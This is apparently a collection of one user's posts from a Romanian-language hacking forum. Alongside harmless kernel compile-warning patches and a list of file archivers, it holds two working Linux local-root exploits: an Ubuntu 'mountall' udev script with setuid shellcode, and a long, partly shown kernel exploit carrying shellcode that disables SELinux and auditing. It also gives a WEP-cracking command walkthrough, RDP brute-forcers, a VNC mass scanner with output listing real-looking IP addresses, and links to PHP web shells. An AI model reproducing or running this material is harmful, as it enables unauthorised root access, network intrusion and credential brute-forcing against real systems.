Nytro

Wikipedia: "PaX is a patch for the Linux kernel that implements least privilege protections for memory pages. The least-privilege approach allows computer programs to do only what they have to do in order to be able to execute properly, and nothing more. PaX was first released in 2000."

Sunteti slabi, cu Nokia 3310 puteti face sniffing la convorbiri, le puteti inregistra.

Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability #!/bin/sh # by fuzz. For Anux inc. # # ubuntu 10.04 , 10.10 if [ -z "$1" ] then echo "usage: $0 <UDEV KERNEL EVENT>" echo "see here http://www.reactivated.net/writing_udev_rules.html" exit fi cat > usn985-exploit.sh << EOF #!/bin/sh chown root:root $PWD/usn985-sc chmod +s $PWD/usn985-sc EOF cat > usn985-sc.c << EOF char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; main(){int *r;*((int *)&r+2)=(int)s;} EOF gcc usn985-sc.c -o usn985-sc echo "KERNEL==\"$1\", RUN+=\"$PWD/usn985-exploit.sh\"" >> /dev/.udev/rules.d/root.rules chmod +x usn985-exploit.sh echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)" echo "Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root" Vulnerable: Ubuntu Ubuntu Linux 10.04 LTS Not Vulnerable: Ubuntu mountall 2.15.2 Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability [I]Ubuntu Linux is prone to a local privilege-escalation vulnerability that affects the 'mountall' package. Local attackers can exploit this issue to execute arbitrary commands as the 'root' user. Successful exploits can completely compromise an affected computer. Ubuntu 10.04 LTS is vulnerable; other versions may also be affected. [/I] Update: http://security.ubuntu.com/ubuntu/pool/main/m/mountall/mountall_2.15.2_i386.deb Incercati si voi, cei cu Ubuntu.

Mi se pare o mare tampenie. 1) $ipLog="cookies.html"; - Datele sunt salvate intr-un fisier HTML, asta inseamna un posibil XSS (na, nu prea util, dar cine stie) 2) $cookie = $HTTP_GET_VARS["c"]; - Asta nu e cookie Da, salveaza cateva date, dar cam atat, cookie pauza. Si se poate mai elegant, sa se foloseasca php_gd si sa se genereze o imagine png, astfel nu va avea cum sa stie nimeni (nu neaparat) ca e vorba de un script PHP.

Nu aici. Trashed.

[PATCH] /drivers/acpi/acpica/nsrepair.c (2.6.34.7) - Fixed useless compile warning Avertisment: drivers/acpi/acpica/nsrepair.c: In function ‘acpi_ns_repair_object’: drivers/acpi/acpica/nsrepair.c:125:29: warning: ‘new_object’ may be used uninitialized in this function Patch: --- a/drivers/acpi/acpica/nsrepair.c 2010-09-20 08:35:56.568006487 +0300 +++ b/drivers/acpi/acpica/nsrepair.c 2010-09-20 08:00:40.000000000 +0300 @@ -122,7 +122,7 @@ acpi_ns_repair_object(struct acpi_predef union acpi_operand_object **return_object_ptr) { union acpi_operand_object *return_object = *return_object_ptr; - union acpi_operand_object *new_object; + union acpi_operand_object *new_object = NULL; acpi_status status; ACPI_FUNCTION_NAME(ns_repair_object);

ISO/ISC DTR 19769 (August 21, 2010) Working Draft, Standard for Programming Language C++ Download: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2010/n3126.pdf Interesant, si are doar 1331 (puteau sa mai puna si ei inca 6 cu poze) de pagini.

Prefer Asus, Intel, ATI. De ce? Habar nu am. Dar mi se par firme serioase, mai serioase decat competitorii. La mine e ca si Nokia vs altceva. Mi se par produsele mai de calitate. Nu stiu cum sa spun, dar intre un procesor Intel si unul AMD cu exact aceleasi "calitati" (features) as alege Intel.

Open Source File Archivers for Linux Posted by jun auza On 9/16/2010 A computer program that merges a number of files together into one archive file, or a series of archive files, for simpler transportation, storage, or backup is called a file archiver. Archiving or packing refers to the process of making an archive file, while unarchiving, unpacking or extracting means reconstructing the original files from the archive. The simplest file archivers just gather a list of files and concatenate their contents sequentially into the archive. For transferring a large number of individual files over a high latency network like the Internet, numerous file archivers employ archive formats that provide lossless data compression to reduce the size of the archive. If you are looking for a capable free and open-source file archiver for Linux, you should check out this list, and then pick out the one that would suit your needs: Xarchiver Xarchiver is a popular GTK+2 based file archiver that is designed to be independent of the desktop environment. It is utilized in a good number of lightweight Linux distributions like Xfce and LXDE. Xarchiver supports 7-zip, arj, bzip2, gzip, rar, lha, lzma, lzop, deb, rpm, tar and zip archives, archive navigation with mimetype icons, archive comment ability and archive listing as HTML or txt. Cut/Copy/Paste/Rename actions within files of variety of archives are also supported. Password detection and protection is automatic for arj, zip and rar files. File Roller File Roller is a simple and easy-to-use archive manager for the GNOME desktop environment. It has a graphical user interface and can create and modify archives, view the content of an archive and files contained in the archive, and of course extract files from the archive. It supports plenty of archive files such as 7-Zip (.7z), Tar, WinAce (.ace), gzip, RAR, and a whole lot more. Ark Ark is an archiving tool for the KDE desktop environment that is included into kdeutils package. It can view, extract, create, and modify archives through its intuitive GUI. Ark can handle different file formats that include tar, gzip, bzip2, zip, rar and lha. If the appropriate plugin from kdeaddons package is installed, it can be integrated into Konqueror in the KDE environment to handle archives through KParts technology. PeaZip PeaZip is both a file manager and file archiver that supports its native PEA archive format, featuring compression, multi volume split and flexible authenticated encryption, and integrity check schemes. It also has support for other mainstream formats, with special focus on handling open formats. With PeaZip, users can run extracting and archiving operations automatically using command-line generated exporting the job defined in the GUI front-end. For speeding up archiving or backup operation's definition, it can also create, edit and restore an archive's layout. FreeArc FreeArc is a fast and efficient file archiver that is said to work 2–5 times quicker than best programs in each compression class (ccm, 7-zip, rar, uharc -mz, pkzip) while retaining the same compression ratio. From technical grounds, it is superior to any existing practical compressor. Features include: * AES/Blowfish/Twofish/Serpent encryption * FAR and Total Commander plugins * Solid compression with smart updates * Ability to create self-extracting archives and installers * Archive protection and recovery

Liviu Guta, Florin Peste si Play AJ - Sambata, duminica :->

Ideea e simpla. Nu ma intereseaza daca e infectat sau nu. Daca sunteti baieti isteti il rulati pe masina virtuala. Daca sunteti si mai destepti nu il descarcati, deci nu il rulati.

Mm de copil prost. http://www.virustotal.com/file-scan/report.html?id=28d0e945f0648bed7b7b2a2139f2b9bf1901feec39ff4f6c0315fa58e054f44e-1283279679 E detectat ca HACKTOOL, adica nu ca TROJAN sau ce iti mai baga mata in cur. Ban. Sa inteleaga toti ratatii ca asta de mai sus. Sunt si programe care nu fura parolele de Firefox (PSW.Stealer) sau nu permit controlul de la distanta al calculatorului vostru (Backdoor, RAT, Trojan) sau altele, dar care SUNT DETECTATE. Asta nu inseamna neaparat ca se caca in calculatoru vostru. Nu stau sa verific toate programele pe care le postez daca sunt infectate, nu o sa stea nimeni sa faca asta. Scanati pe virustotal, va uitati si voi ca ce anume e detectat un program. Sau mai bine verificati voi daca programul e infectat si gata, nu mai veniti aici ca "e virusat" sau alte prostii.

These are Top 20 Hacking Tools, the list is exhaustive, this are a few to name. Nessus The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix. Ethereal Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. Snort Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks. Netcat Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol TCPdump TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications. Hping Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions). DNSiff DNSiff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). GFI LANguard GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities. Ettercap >Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones)and includes many feature for network and host analysis. Nikto Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers. John the Ripper John the Ripper is a fast password cracker, currently available for many flavors of Unix. OpenSSH OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks. TripWire Tripwire is a tool that can be used for data and program integrity assurance. Kismet Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area. NetFilter NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packetmangling. IP Filter IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services. pf OpenBSD Packet Filter fport fport identifys all open TCP/IP and UDP ports and maps them to the owning application. SAINT SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited. OpenPGP OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann. Sursa: Top 20 Hacking Tools | Hacking Truths

Cred ca aici e fara parola: Download RDP Brute v.0.6.rar from Sendspace.com - send big files the easy way

CRACK WIFI – Simple WEP Crack Overview To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time. Equipments used Wifi Adaptor : Alfa AWUS036H (available on eBay & Amazon) Software : Backtrack 4 (Free download from BackTrack Linux - Penetration Testing Distribution) Step 1 – Start the wireless interface in monitor mode on AP channel airmon-ng start wlan1 6 starts wifi interface in channel 6 Step 2 – Test Wireless Device Packet Injection aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E wlan1 -9 means injection -a 00:1B:11:24:27:2E is the access point MAC address Step 3 – Start airodump-ng to capture the IVs airodump-ng -c 6 –bssid 00:1B:11:24:27:2E -w output wlan1 Step 4 – Use aireplay-ng to do a fake authentication with the access point In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets. aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1 -1 means fake authentication 0 reassociation timing in seconds -e infosec is the wireless network name -a 00:14:6C:7E:40:80 is the access point MAC address -h 00:0F:B5:88:AC:82 is our card MAC address OR aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1 2 – Reauthenticate every 2 seconds. -o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs. -q 10 – Send keep alive packets every 10 seconds. Troubleshooting Tips Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and… Run: tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)” You would then look for error messages. If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and… Run: “tcpdump -n -e -s0 -vvv -i wlan1” Here is a typical tcpdump error message you are looking for: 11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets. If you want to select only the DeAuth packets with tcpdump then you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You may need to tweak the phrase “DeAuth” to pick out the exact packets you want. Step 5 – Start aireplay-ng in ARP request replay mode aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1 Step 6 – Run aircrack-ng to obtain the WEP key aircrack-ng -b 00:1B:11:24:27:2E output*.cap All Done! Sursa: Crack Wifi | Hacking Articles

RDP Scanner [bruteForce] Nu am incercat, nu stiu daca e infectat. RDP Brutus, based on all known tss Brutus. * Select the type of scan IP: one specified range, either immediately on the list of ranges. * Option flows for the scanner, the ability to change the port for the scan * Settings flows for Brutus (how IP will be checked on a separate thread) * Ability to scan without Brutus * Brutus, a list of usernames to the list of passwords * Work anywhere on the disk (including the Russian way) * Avtosvorachivanie windows Brutus * Edit the list of usernames and passwords directly from the program * Output sbruchennyh grandparents in a separate window by pressing the button at any time (even in the Brut) * Sending Hoods at your number ICQ (master Ween - Ie only the number that you want to send - you can specify in the preferences) Howto: http://www.file-upload.net/download-2791486/h4cky0u.txt.html Download: http://www.sendspace.com/file/tv1whv Sursa: h4cky0u

Nu le-am incercat, nu stiu daca sunt infectate... The scanner runs through a file with extension . bat , or as many call it "batnik. Which contains the lines, for example:'' vnc.exe -I 88.158.0.0-88,158,255,255 -P 3389 -cT -T 2900 where vnc.exe - the name of the scanner 88.158.0.0-88.158.255.255 - scanning range 3389 - the port on which the scanned range 2900 - number of threads Scanned the list is saved in a file VNC_bypauth.txt, obtained a list of species -------------------------------------------------- -------------------------- COMMAND: vnc.exe -I 88.158.0.0-88,158,255,255 -P 3389 -cT -T 2900 -------------------------------------------------- -------------------------- 88.158.1.66 :3389 88.158.1.186 :3389 88.158.1.222 :3389 88.158.5.2 :3389 88.158.5.22 :3389 88.158.6.14 :3389 88.158.6.22 :3389 88.158.9.26 :3389 88.158.9.54 :3389 88.158.9.78 :3389 88.158.9.166 :3389 88.158.9.182 :3389 88.158.9.194 :3389 88.158.10.34 :3389 88.158.11.18 :3389 88.158.12.42 :3389 88.158.12.46 :3389 Of course, you can remove all unnecessary hands, but also there is another batnik, which removes all the rubbish and keep on file result_ip.txt only ip-address, open port 3389. Sam batnik: del result_ip.txt Findstr /C:": 3389" VNC_bypauth.txt>vnc1.txt FOR /F "eol = tokens = number 1 delims =:" %%I in (vnc1.txt) do @ echo%%I>>result_ip.txt del vnc1.txt Download the archive with two batnikami and scanner can be in the enclosure. The second version of the scanner, but it has a GUI-shell. VNC-Scanner GUI For fans of the scanner VNC: convenient GUI with packed inside the scanner diapy built for scan, which can be unpacked at any time parser low weight (162 kb) and to all this - source code on Delphi -> You can add your function or anything else. http://www.proxy-base.org/attachments/f20/1015d1267652722-vnc_scanner-vnc_scanner_gui.zip http://www.proxy-base.org/attachments/f20/1057d1268594784-vnc_scanner-vnc_scanner.rar VNC-Scanner GUI v.1.1 Added: - Ability to scan the specified ranges. http://www.proxy-base.org/attachments/f20/1088d1269698414-vnc_scanner-vnc_scanner_gui_v.1.1.zip VNC-Scanner GUI v.1.2 http://www.proxy-base.org/attachments/f20/1252d1271586730-vnc_scanner-vnc_scanner_gui.rar

SQL Injection and XSS Tools Nu am descarcat, nu am incercat etc. Apache Hacking TooLz Directory: Apache Chunked Scanner Apache Hacker Tool v 2.0 Apache H4x0r Script Remote File Inclusion And Remote Command Execution Directory : IIS 5 Dav Scanner & Exploiter PHP Attacker PHP Injection Scanner & Exploiter XML-RPC Scanner & Exploiter Databases & SQL Injection & XSS TooLz Directory Casi 4.0 ForceSQL Mssql BruteForce TooL SQL Ping 2 SQL Recon SQL Vuln Scanner SQL & XSS TooL PHP Shells **** v2.0 c99shell #16 Backdoor php v0.1 r57shell ajan casus15 cmd (asp) CyberEye (asp) CyberSpy5 (asp) Indexer (asp) Ntdaddy (asp) News Remote PHP Shell Injection PHP Shell phpRemoteView Download: http://rapidshare.com/files/132986898/SQL_InjecTion___XSS_TooLz.rar

[PATCH] drivers/block/cciss.c (2.6.34.7): Fixed useless compile warning Cam la fel, un vector e initializat intr-un else, si in teorie poate fi folosit neinitializat, in practica nu se intampla asta, dar compilatorul nu are de unde sa stie asta. Doar o simpla initializare cu 0. Nu vor mai aparea aceste avertismente urate: drivers/block/cciss.c: In function ‘dev_show_unique_id’: drivers/block/cciss.c:564:7: warning: ‘sn[0]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[1]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[2]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[3]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[4]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[5]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[6]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[7]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[8]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[9]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[10]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[11]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[12]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[13]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[14]’ may be used uninitialized in this function drivers/block/cciss.c:564:7: warning: ‘sn[15]’ may be used uninitialized in this function Patch: --- a/drivers/block/cciss.c 2010-09-17 20:17:49.844010958 +0300 +++ b/drivers/block/cciss.c 2010-09-13 19:54:58.000000000 +0300 @@ -561,7 +561,7 @@ static ssize_t dev_show_unique_id(struct { drive_info_struct *drv = to_drv(dev); struct ctlr_info *h = to_hba(drv->dev.parent); + __u8 sn[16]; - __u8 sn[16] = {0}; unsigned long flags; int ret = 0; Edit: Era inversat acesta, modificasem fisierul original sa vad daca mai apare eroare, si era inversat + cu -.

Ma bucur sa vad ca exista oameni interesati si de aceste lucruri. Imi place aceasta activitate. Am mai trimis unul, dar nu am stiut exact cui, l-am trimis la "trivial". [PATCH] /init/main.c (2.6.34.7) Fixed useless compile warning From: Ionut Gabriel Popescu <*******@yahoo.com> First of all, I am really sorry, I didn't know where to send this, I didn't know who is the maintainer of that (/init) section. This is not practically a bug, but the compiler can't be sure about that. The calltime structure is initialized in the first if and it is used in same condition if downer, but the compiler doesn't know that is the same condition, that si always the same and throw this warning: init/main.c: In function ‘do_one_initcall’: init/main.c:722:10: warning: ‘calltime.tv64’ may be used uninitialized in this function And this is ugly. It is very easy to fix it, just initialize the calltime structure with 0. It isn't necessary, but the compiler won't throw that ugly warning anymore. I am sorry for sending this to you, can you send it where it would be coreect please? Thanks. Patch: Signed-off-by: Ionut Gabriel Popescu <*******@yahoo.com> --- --- a/init/main.c 2010-09-17 10:37:25.496004183 +0300 +++ b/init/main.c 2010-09-13 19:54:58.000000000 +0300 @@ -719,7 +719,7 @@ static struct boot_trace_ret ret; int do_one_initcall(initcall_t fn) { int count = preempt_count(); - ktime_t calltime = {0}, delta, rettime; + ktime_t calltime, delta, rettime; if (initcall_debug) { call.caller = task_pid_nr(current); Sa vedem daca o sa fie reparat. De obicei dureaza cam 2 saptamani pana apar, cam asa am inteles. Bine, cele de securitate sunt reparate in maxim cateva ore.

Nu mi se pare nimic ciudat la el, sau nu am inteles ce vrei sa spui. Mai intai sunt incluse headerele apoi sunt definite 2 tipuri de functii apoi functiile pe care le foloseste, apoi main-ul.

Linux Kernel 2.6.27+ x86_64 compat exploit /* Ac1dB1tch3z Vs Linux Kernel x86_64 0day Today is a sad day.. R.I.P. Tue, 29 Apr 2008 / Tue, 7 Sep 2010 a bit of history: MCAST_MSFILTER Compat mode bug found... upon commit! (2 year life on this one) author David L Stevens <dlstevens () us ibm com> Tue, 29 Apr 2008 10:23:22 +0000 (03:23 -0700) committer David S. Miller <davem () davemloft net> Tue, 29 Apr 2008 10:23:22 +0000 (03:23 -0700) This patch adds support for getsockopt for MCAST_MSFILTER for both IPv4 and IPv6. It depends on the previous setsockopt patch, and uses the same method. Signed-off-by: David L Stevens <dlstevens () us ibm com> Signed-off-by: YOSHIFUJI Hideaki <yoshfuji () linux-ipv6 org> Signed-off-by: David S. Miller <davem () davemloft net> ------------------------------------------------------------ Thank you for signing-off on this one guys. This exploit has been tested very thoroughly over the course of the past few years on many many targets. Thanks to redhat for being nice enough to backport it into early kernel versions (anything from later August 2008+) Ac1dB1tch3z would like to say F*** YOU Ben Hawkes. You are a new hero! You saved the plan8 man. Just a bit too l8. PS: OpenVZ Payload / GRsec bypass removed for kidiots and fame whores. (same thing right */ #include <poll.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <stdlib.h> #include <sys/wait.h> #include <sys/utsname.h> #include <sys/socket.h> #include <sched.h> #include <netinet/in.h> #include <stdio.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/mman.h> #include <sys/ipc.h> #include <sys/msg.h> #include <errno.h> #ifndef __i386__ #error "r34d th3 c0d3 m0r0n!!# () #" #else #define _GNU_SOURCE #define __dgdhdytrg55 unsigned int #define __yyrhdgdtfs66ytgetrfd unsigned long long #define __dhdyetgdfstreg__ memcpy #define VERT "\033[32m" #define NORM "\033[0m" #define BANNER VERT"Ac1dB1tCh3z "NORM"VS Linux kernel 2.6 kernel 0d4y\n" #define KALLSYMS "/proc/kallsyms" #define TMAGIC_66TDFDRTS "/proc/timer_list" #define SELINUX_PATH "/selinux/enforce" #define RW_FOPS "timer_list_fops" #define PER_C_DHHDYDGTREM7765 "per_cpu__current_task" #define PREPARE_GGDTSGFSRFSD "prepare_creds" #define OVERRIDE_GGDTSGFSRFSD "override_creds" #define REVERT_DHDGTRRTEFDTD "revert_creds" #define Y0Y0SMAP 0x100000UL #define Y0Y0CMAP 0x200000UL #define Y0Y0STOP (Y0Y0SMAP+0xFFC) #define J0J0S 0x00200000UL #define J0J0R00T 0x002000F0UL #define PAGE_SIZE 0x1000 #define KERN_DHHDYTMLADSFPYT 0x1 #define KERN_DGGDYDTEGGETFDRLAK 0x2 #define KERN_HHSYPPLORQTWGFD 0x4 #define KERN_DIS_GGDYYTDFFACVFD_IDT 0x8 #define KERN_DIS_DGDGHHYTTFSR34353_FOPS 0x10 #define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM 0x20 #define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX 0x40 #define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver,".el5")) #define TRY_REMAP_DEFAULT 1 #define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while(0) #define __pppp_tegddewyfg(s) do { fprintf(stdout, "%s", s); } while(0) #define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0) #define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0) static char buffer[1024]; static int s; static int flags=0; volatile static socklen_t magiclen=0; static int useidt=0, usefops=0, uselsm=0; static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0}; static __dgdhdytrg55 _m_cpu_off=0; static char krelease[64]; static char kversion[128]; #define R0C_0FF 14 static char ttrg0ccc[]= "\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41" "\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c" "\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11" "\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02" "\xeb\xcc\x5e\x5b\x5f\x59\xc3"; #define R0YTTTTUHLFSTT_OFF1 5 #define R0YGGSFDARTDF_DHDYTEGRDFD_D 21 #define R0TDGFSRSLLSJ_SHSYSTGD 45 char r1ngrrrrrrr[]= "\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3" "\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42" "\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7" "\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43" "\xff\xd3\x5f\x5f\x5a\x5b\xc3"; #define RJMPDDTGR_OFF 13 #define RJMPDDTGR_DHDYTGSCAVSF 7 #define RJMPDDTGR_GDTDGTSFRDFT 25 static char ttrfd0[]= "\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00" "\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0" "\x58\x5f" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xc3"; /* implement selinux bypass for IDT ! */ #define RJMPDDTGR_OFF_IDT 14 #define RJMPDDTGR_DYHHTSFDARE 8 #define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27 static char ruujhdbgatrfe345[]= "\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00" "\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0" "\x0f\x01\xf8" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x48\xcf"; #define CJE_4554TFFDTRMAJHD_OFF 10 #define RJMPDDTGR_AYYYDGTREFCCV7761_OF 23 static char dis4blens4sel1nuxhayettgdr64545[]= "\x41\x52\x50" "\xb8\x00\x00\x00\x00" "\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x89\x02" "\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42" "\x41\x89\x02" "\x58\x41\x5a"; /* rhel LSM stuffs */ #define RHEL_LSM_OFF 98 struct LSM_rhel { __yyrhdgdtfs66ytgetrfd selinux_ops; __yyrhdgdtfs66ytgetrfd capability_ops; __yyrhdgdtfs66ytgetrfd dummy_security_ops; __yyrhdgdtfs66ytgetrfd selinux_enforcing; __yyrhdgdtfs66ytgetrfd audit_enabled; const char *krelease; const char *kversion; }; struct LSM_rhel known_targets[4]= { { 0xffffffff8031e600ULL, 0xffffffff8031fec0ULL, 0xffffffff804acc00ULL, 0xffffffff804af960ULL, 0xffffffff8049b124ULL, "2.6.18-164.el5", "#1 SMP Thu Sep 3 03:28:30 EDT 2009" // to manage minor/bug fix changes }, { 0xffffffff8031f600ULL, 0xffffffff80320ec0ULL, 0xffffffff804afc00ULL, 0xffffffff804b2960ULL, 0xffffffff8049e124ULL, "2.6.18-164.11.1.el5", "#1 SMP Wed Jan 6 13:26:04 EST 2010" }, { 0xffffffff805296a0ULL, 0xffffffff8052af60ULL, 0xffffffff806db1e0ULL, 0xffffffff806ddf40ULL, 0xffffffff806d5324ULL, "2.6.18-164.11.1.el5xen", "#1 SMP Wed Jan 20 08:06:04 EST 2010" // default xen }, { 0xffffffff8031f600ULL,// d selinux_ops 0xffffffff80320ec0ULL,// d capability_ops 0xffffffff804afc00ULL,// B dummy_security_ops 0xffffffff804b2960ULL,// B selinux_enforcing 0xffffffff8049e124ULL,// B audit_enabled "2.6.18-164.11.1.el5", "#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire target LoL } }; static struct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt; struct socketcallAT { int s; int level; int optname; void *optval; volatile socklen_t *optlen; }__attribute__((packed)); struct idt64from32_s { unsigned short limit; unsigned long base; }__attribute__((packed)); static __yyrhdgdtfs66ytgetrfd getidt() { struct idt64from32_s idt; memset(&idt, 0x00, sizeof(struct idt64from32_s)); asm volatile("sidt %0" : "=m"(idt)); return idt.base | 0xFFFFFFFF00000000ULL; } static int isSelinuxEnabled() { FILE *selinux_f; selinux_f = fopen(SELINUX_PATH, "r"); if(selinux_f == NULL) { if(errno == EPERM) return 1; else return 0; } fclose(selinux_f); return 1; } static int wtfyourunhere_heee(char *out_release, char* out_version) { int ret; const char*ptr; int count=0; char r[32], *bptr; struct utsname buf; ret = uname(&buf); if(ret < 0) return -1; strcpy(out_release, buf.release); strcpy(out_version, buf.version); ptr = buf.release; bptr = r; memset(r, 0x00, sizeof(r)); while(*ptr) { if(count == 2) { if(*ptr >= '0' && *ptr <= '9') *bptr++ = *ptr; else break; } if(*ptr == '.') count++; ptr++; } if(strlen(r) < 1 || !atoi(r)) return -1; return atoi(r); } static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table) { *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table->selinux_enforcing; *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table->audit_enabled; __dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1); __dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1); } static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char* s, const char* filename, int ignore_flag) { FILE *ka; char line[512]; char reloc_a[64]; char reloc[64]; if(!(flags & 